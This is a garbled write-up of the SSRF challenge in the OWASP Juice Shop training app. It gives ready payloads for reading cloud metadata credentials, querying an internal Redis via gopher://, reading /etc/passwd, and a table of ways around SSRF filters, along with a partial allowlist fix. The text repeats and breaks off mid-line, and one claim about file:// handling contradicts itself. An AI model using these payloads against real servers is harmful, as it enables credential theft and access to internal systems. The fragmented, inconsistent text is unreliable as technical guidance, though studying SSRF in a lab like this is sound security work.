Shop Ssrf — Juice

"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin" This would return the server's temporary AWS keys. Using the gopher:// protocol (if enabled in the request library or http module):

http://localhost:3000/solve/challenge/ssrf juice shop ssrf

gopher://internal-redis:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a This could dump internal databases. Leverage timing attacks. For each port: "url": "http://169

"url": "file:///etc/passwd" Juice Shop's Node.js request module does follow file:// by default, but older urllib or curl wrappers do. Defenses: How to Kill SSRF Juice Shop is vulnerable by design. Here is how to fix it in production: 1. Allowlist, Never Blocklist const ALLOWED_DOMAINS = ['maps.googleapis.com', 'trusted-cdn.com']; const urlObj = new URL(userUrl); if (!ALLOWED_DOMAINS.includes(urlObj.hostname)) return res.status(403).send('Domain not allowed'); Allowlist, Never Blocklist const ALLOWED_DOMAINS = ['maps

Juice Shop downloads this image server-side and then serves it to the client. The parameter center (the address) is partially user-influenced via the order database.

); );

| Defense | Bypass Technique | |---------|------------------| | Block localhost | Use 127.0.0.1 , 0.0.0.0 , [::1] , or localhost.me | | Block IP addresses | Use decimal IP: http://2130706433/ (for 127.0.0.1) | | Block internal subnets | Register a domain internal.yourlab.com that resolves to 10.0.0.1 | | Protocol restriction ( http:// only) | Use file:///etc/passwd or gopher:// or dict:// | The specific Juice Shop SSRF challenge requires you to fetch an image from a non-existent internal service to trigger an error message containing a flag.